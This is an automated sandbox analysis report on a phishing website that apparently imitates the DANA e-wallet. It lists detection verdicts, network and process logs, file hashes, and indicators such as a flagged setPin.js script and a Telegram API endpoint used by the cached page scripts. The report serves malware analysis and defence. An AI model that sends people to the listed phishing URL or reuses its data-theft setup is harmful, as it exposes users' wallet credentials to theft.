Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: classification engineClassification label: mal76.phis.win@17/51@40/19
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,10656444654426491281,9200762998482847054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pengajuan-kartufisik.netlify.app/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,10656444654426491281,9200762998482847054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520064 URL: http://pengajuan-kartufisik... Startdate: 27/09/2024 Architecture: WINDOWS Score: 76 26 Multi AV Scanner detection for domain / URL 2->26 28 Antivirus detection for URL or domain 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 2 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.5 unknown unknown 6->14 16 192.168.2.6, 443, 49537, 49698 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 youtube.com 142.250.184.206, 443, 49729 GOOGLEUS United States 11->20 22 www.google.com 172.217.18.4, 443, 49730, 58912 GOOGLEUS United States 11->22 24 17 other IPs or domains 11->24

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://pengajuan-kartufisik.netlify.app/100%Avira URL Cloudphishing
http://pengajuan-kartufisik.netlify.app/18%VirustotalBrowse
http://pengajuan-kartufisik.netlify.app/100%SlashNextFraudulent Website type: Phishing & Social usering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
jsdelivr.map.fastly.net0%VirustotalBrowse
app.link0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
i.ibb.co0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
youtube.com0%VirustotalBrowse
maxcdn.bootstrapcdn.com0%VirustotalBrowse
cdn.lr-ingest.io0%VirustotalBrowse
cdnjs.cloudflare.com0%VirustotalBrowse
sentry.io0%VirustotalBrowse
www.google.com0%VirustotalBrowse
cdn.jsdelivr.net0%VirustotalBrowse
code.ionicframework.com0%VirustotalBrowse
www.dana.id0%VirustotalBrowse
pengajuan-kartufisik.netlify.app18%VirustotalBrowse
a.m.dana.id0%VirustotalBrowse
api2.branch.io0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://getbootstrap.com/)0%URL Reputationsafe
https://github.com/google/material-design-icons0%VirustotalBrowse
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/fonts/slick.woff0%VirustotalBrowse
https://github.com/google/material-design-icons0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/fonts/slick.woff0%Avira URL Cloudsafe
https://i.ibb.co/C1f1Y0C/logo-lps.png0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/main/LICENSE)0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css0%Avira URL Cloudsafe
https://twitter.com/benjsperry0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css0%Avira URL Cloudsafe
https://api2.branch.io0%Avira URL Cloudsafe
http://ionicons.com/0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/main/LICENSE)0%VirustotalBrowse
https://cdn.jsdelivr.net/npm/bootstrap0%VirustotalBrowse
https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css0%VirustotalBrowse
https://i.ibb.co/khmXKS2/logo-ojk.png0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css0%VirustotalBrowse
http://ionicons.com/0%VirustotalBrowse
https://github.com/driftyco/ionicons0%Avira URL Cloudsafe
https://www.dana.id/favicon.ico0%Avira URL Cloudsafe
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js0%VirustotalBrowse
https://api2.branch.io0%VirustotalBrowse
https://twitter.com/benjsperry0%VirustotalBrowse
https://github.com/driftyco/ionicons0%VirustotalBrowse
https://api.telegram.org/$0%Avira URL Cloudsafe
https://twitter.com/ionicframework0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js0%Avira URL Cloudsafe
https://pengajuan-kartufisik.netlify.app/setPin.js100%Avira URL Cloudphishing
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css0%VirustotalBrowse
https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
https://twitter.com/ionicframework0%VirustotalBrowse
https://www.dana.id/favicon.ico0%VirustotalBrowse
https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js0%VirustotalBrowse
https://app.link0%Avira URL Cloudsafe
https://a.m.dana.id0%Avira URL Cloudsafe
https://a.m.dana.id/danaweb/promo/1678877820-Thumbnail---DANA-Deals__2_.png0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css0%Avira URL Cloudsafe
https://a.m.dana.id/danaweb/promo/1675835033-BRI-GPN-2023-Q1-Top-Up-Thumbnail.png0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/graphs/contributors)0%VirustotalBrowse
https://a.m.dana.id/danaweb/web/dana-meta-logo.png0%Avira URL Cloudsafe
https://a.m.dana.id0%VirustotalBrowse
https://i.ibb.co/fpXTF6b/danaa-4lt.jpg0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel0%Avira URL Cloudsafe
http://getbootstrap.com)0%Avira URL Cloudsafe
https://app.link0%VirustotalBrowse
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://api.telegram.org/$1%VirustotalBrowse
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/ajax-loader.gif0%Avira URL Cloudsafe
https://sentry.io0%Avira URL Cloudsafe
https://youtube.com0%Avira URL Cloudsafe
https://cdn.lr-ingest.io0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.css0%Avira URL Cloudsafe
http://creativecommons.org/licenses/by/4.0/0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.129.229
truefalseunknown
app.link
65.9.66.56
truefalseunknown
sentry.io
35.186.247.156
truefalseunknown
maxcdn.bootstrapcdn.com
104.18.11.207
truefalseunknown
cdn.lr-ingest.io
188.114.96.3
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
i.ibb.co
162.19.58.161
truefalseunknown
youtube.com
142.250.184.206
truefalseunknown
bg.microsoft.map.fastly.net
199.232.210.172
truefalseunknown
cdnjs.cloudflare.com
104.17.25.14
truefalseunknown
www.google.com
172.217.18.4
truefalseunknown
pengajuan-kartufisik.netlify.app
52.58.254.253
truefalseunknown
code.ionicframework.com
172.67.69.29
truefalseunknown
api2.branch.io
108.138.26.27
truefalseunknown
cdn.jsdelivr.net
unknown
unknownfalseunknown
a.m.dana.id
unknown
unknownfalseunknown
www.dana.id
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/fonts/slick.wofffalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://i.ibb.co/C1f1Y0C/logo-lps.pngfalse
  • Avira URL Cloud: safe
unknown
https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.cssfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.cssfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://i.ibb.co/khmXKS2/logo-ojk.pngfalse
  • Avira URL Cloud: safe
unknown
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.jsfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.cssfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.jsfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://pengajuan-kartufisik.netlify.app/setPin.jstrue
  • Avira URL Cloud: phishing
unknown
http://pengajuan-kartufisik.netlify.app/true
    unknown
    https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.cssfalse
    • Avira URL Cloud: safe
    unknown
    https://pengajuan-kartufisik.netlify.app/false
      unknown
      https://i.ibb.co/fpXTF6b/danaa-4lt.jpgfalse
      • Avira URL Cloud: safe
      unknown
      https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.jsfalse
      • Avira URL Cloud: safe
      unknown
      https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/ajax-loader.giffalse
      • Avira URL Cloud: safe
      unknown
      https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick-theme.cssfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://github.com/google/material-design-iconschromecache_78.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://cdn.jsdelivr.net/npm/bootstrapchromecache_64.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_59.2.dr, chromecache_87.2.dr, chromecache_63.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://twitter.com/benjsperrychromecache_78.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://api2.branch.iochromecache_64.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://ionicons.com/chromecache_78.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://getbootstrap.com/)chromecache_59.2.dr, chromecache_87.2.dr, chromecache_63.2.drfalse
      • URL Reputation: safe
      unknown
      https://github.com/driftyco/ioniconschromecache_78.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://www.dana.id/favicon.icochromecache_64.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://api.telegram.org/$chromecache_67.2.dr, chromecache_66.2.drtrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://twitter.com/ionicframeworkchromecache_78.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://github.com/twbs/bootstrap/graphs/contributors)chromecache_87.2.dr, chromecache_63.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://app.linkchromecache_64.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://a.m.dana.idchromecache_64.2.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://a.m.dana.id/danaweb/promo/1678877820-Thumbnail---DANA-Deals__2_.pngchromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://a.m.dana.id/danaweb/promo/1675835033-BRI-GPN-2023-Q1-Top-Up-Thumbnail.pngchromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://a.m.dana.id/danaweb/web/dana-meta-logo.pngchromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://cdn.jsdelivr.net/npm/slick-carouselchromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://getbootstrap.com)chromecache_79.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_79.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://sentry.iochromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://youtube.comchromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://cdn.lr-ingest.iochromecache_64.2.drfalse
      • Avira URL Cloud: safe
      unknown
      http://creativecommons.org/licenses/by/4.0/chromecache_78.2.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      162.19.58.161
      i.ibb.coUnited States
      209CENTURYLINK-US-LEGACY-QWESTUSfalse
      151.101.129.229
      jsdelivr.map.fastly.netUnited States
      54113FASTLYUSfalse
      172.67.69.29
      code.ionicframework.comUnited States
      13335CLOUDFLARENETUSfalse
      35.186.247.156
      sentry.ioUnited States
      15169GOOGLEUSfalse
      3.72.140.173
      unknownUnited States
      16509AMAZON-02USfalse
      65.9.66.56
      app.linkUnited States
      16509AMAZON-02USfalse
      3.70.101.28
      unknownUnited States
      16509AMAZON-02USfalse
      142.250.184.206
      youtube.comUnited States
      15169GOOGLEUSfalse
      104.17.24.14
      unknownUnited States
      13335CLOUDFLARENETUSfalse
      108.138.26.27
      api2.branch.ioUnited States
      16509AMAZON-02USfalse
      172.217.18.4
      www.google.comUnited States
      15169GOOGLEUSfalse
      162.19.58.156
      unknownUnited States
      209CENTURYLINK-US-LEGACY-QWESTUSfalse
      104.18.11.207
      maxcdn.bootstrapcdn.comUnited States
      13335CLOUDFLARENETUSfalse
      52.58.254.253
      pengajuan-kartufisik.netlify.appUnited States
      16509AMAZON-02USfalse
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      188.114.96.3
      cdn.lr-ingest.ioEuropean Union
      13335CLOUDFLARENETUSfalse
      104.17.25.14
      cdnjs.cloudflare.comUnited States
      13335CLOUDFLARENETUSfalse
      IP
      192.168.2.6
      192.168.2.5
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1520064
      Start date and time:2024-09-27 04:25:41 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 11s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:browseurl.jbs
      Sample URL:http://pengajuan-kartufisik.netlify.app/
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal76.phis.win@17/51@40/19
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 142.250.186.78, 142.250.184.195, 66.102.1.84, 34.104.35.123, 2.20.245.133, 2.20.245.135, 142.250.186.138, 142.250.186.106, 142.250.186.99, 2.16.238.155, 2.16.238.135, 104.18.186.31, 104.18.187.31, 142.250.185.234, 2.20.245.136, 13.85.23.86, 199.232.210.172, 192.229.221.95, 13.95.31.18, 13.85.23.206, 52.165.164.15, 20.242.39.171, 131.107.255.255, 142.250.186.35, 52.165.165.26
      • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, dns.msftncsi.com, a383.r.akamai.net, clients2.google.com, a.m.dana.id.edgesuite.net, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, www.dana.id.edgesuite.net, fs.microsoft.com, accounts.google.com, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a1502.r.akamai.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtSetInformationFile calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 text, with very long lines (65300)
      Category:downloaded
      Size (bytes):193529
      Entropy (8bit):5.014363132838949
      Encrypted:false
      SSDEEP:1536:xtGMGH2K5wlP7WIgHf73Z6LsKkVkpz600I4lp:xtGMZvkVkpz600I4lp
      MD5:6D9C6FDA1E7087224431CC8068BB998F
      SHA1:6273AC1A23D79A122F022F6A87C5B75C2CFAFC3A
      SHA-256:FB1763B59F9F5764294B5AF9FA5250835AE608282FE6F2F2213A5952AACF1FBF
      SHA-512:A3F321A113D52C4C71663085541B26D7B3E4CED9339A1EC3A7C93BFF726BB4D087874010E3CF64C297C0DDD3D21F32837BC602B848715EADD8EF579BFE8E9A9A
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css
      Preview:@charset "UTF-8";/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors. * Copyright 2011-2022 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 300, 8-bit/color RGB, non-interlaced
      Category:downloaded
      Size (bytes):70497
      Entropy (8bit):7.992333165661002
      Encrypted:true
      SSDEEP:1536:6+SWpN+yHMOC8rsZ2MU9XT4392HoxAOYaHQnM7sGbPDIv0oEd:dNCOsZSS2HoxZh7sGbPld
      MD5:AB8BA2E253F8E6B4639007F787670BB5
      SHA1:BC09AC3538294AA878DBA82B8186F970536D73CC
      SHA-256:13B7C85C6456F3D31D110B19A79532E98405C47932D245F14EEAD8BBC272E89D
      SHA-512:3DD8401F7E4C28C99FC39EE22AE97BF8A7DA20ED44CDD0F72554917C2788872D1EAC8DBAE332DDC263FBD2800EC300191D08E00D92CB3A0DE57F11CEFB65E09B
      Malicious:false
      Reputation:low
      URL:https://a.m.dana.id/danaweb/promo/1675835033-BRI-GPN-2023-Q1-Top-Up-Thumbnail.png
      Preview:.PNG........IHDR.......,............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...`......3...!$.. .D@A....-.U.....V[.V[..h/.."....h-.......\*wH.s...........l6...0?.ev..............S..!..."..^.n.G...pW.Q.6.=.:..'_....R............s.OZ.>.......1Z..j.....4...;..m.x.z..(.*6..*^...9i..w.,....W....['..-b..N...[t.....(.TS.. .u.z...+-.....i..w.T;?@.(...augI...]5.T;...~X....y.........]5......n.f@.k8.Jy.T...Z.1...xX..x.c...w.T.sZ...R."..U.'..pWM..c....}4M.4..N..y.T...Z.1.....$.Vc.X.zOTS.j}K..>..:m..3.7D5.......n".<>.....8Q.....*w.TS.<7.W....:.Q.%..]U....j}....T....w.T...Z.....T..j..q.;..>.C...rWM5.. ...G.M.j.}..jX......z../.*.USM..l.(x... ^..q}p.k.Yw..T..~.IF.....x..x...M...^...Z.5.....]...}et+H..f.."E34..h..8..3..$...8wl...W.wO.'p..y..y.....Ee......Ms............]3..#.O.%B..^..s]~.d.g%..QC...n.|~..saN....cZ..|.$....'.}.4l...,..{.N7,]72.P..'.<5.40IWe..31...j..#.c....c*.]...^]2..t.u..iXJdiD..&...M..U..o..d..M..-Ct,......q..LV..f...k..48..}.....iiw.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Web Open Font Format, CFF, length 1380, version 1.0
      Category:downloaded
      Size (bytes):1380
      Entropy (8bit):7.3037706743203845
      Encrypted:false
      SSDEEP:24:IgOu0UjAzqx3dB4ukwkGLTZ2hCJglrujOXZRrzt8Z8DcxLlMRSWIUhP/6f:IgOpUMzaBrkZG8CJgNsK1z6ZAGlEFV6f
      MD5:B7C9E1E479DE3B53F1E4E30EBAC2403A
      SHA1:AF91C12F0F406A4F801AEB3B398768FE41D8F864
      SHA-256:26726BAC4060ABB1226E6CEEBC1336E84930FE7A7AF1B3895A109D067F5B5DCC
      SHA-512:976F6E9D65859B1A5E3BBD426441E6885D1912F5694F40E2897B10F46B3BD0C7D940F7917A6050D6BB8CDEAAA5E5F0332391D3D398F6C21CE27299DFC7036911
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/fonts/slick.woff
      Preview:wOFFOTTO...d.......\........................CFF ..............V.FFTM...8........m..GDEF...T....... .2..OS/2...p...R...`P...cmap.......P...b".D.head...........6..1.hhea...D.......$....hmtx...`.........J.Jmaxp...p..........P.name...x.......n.'..post...T....... ....x.=..o.A..g)['..V 6A..k{7z.w..u.,....B..?x.;[X,...X..HP...H.'x.Mz.YJ.$o...y...7.....0......1..g........0......!t.j./.....Zy.'..T..@.^...'P8.x...>f.E..J....).z...Q'o...mC...QQ.=G._.@../...F...TU.d..PM.q.*.F.........}..8.:.9k.4I...*v.7q.(..#4EQ.~.q(.....[..7q7.*dK'..Z.&..,.6.D.dE.G.W..#o....|Op...{...j5H.l.[-..4....b/k...A.V..|.(I.r..Lm..K8.g.y.8.../...<..|;...........................+..T.j...HP$.N.[.U..._.6F.2...2...p....=*;c......T..1.j..f.4,.......t<4..#....Y8D....F/a]_I.i)NRN..m.8..i)%."..:.....i65.....5..t&......x........x.c```d..s.o....+.a4.Zy....x.c`d``..b...`b`.B.0.....v.7x.c`fb`...............2H2.0001.r2.A...#.R`...4.....D.I...?`.c...6.D...m.J..F.7.....x.c```f.`..F.......|... ......d30$*(
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65451)
      Category:downloaded
      Size (bytes):89476
      Entropy (8bit):5.2896589255084425
      Encrypted:false
      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
      Malicious:false
      Reputation:low
      URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
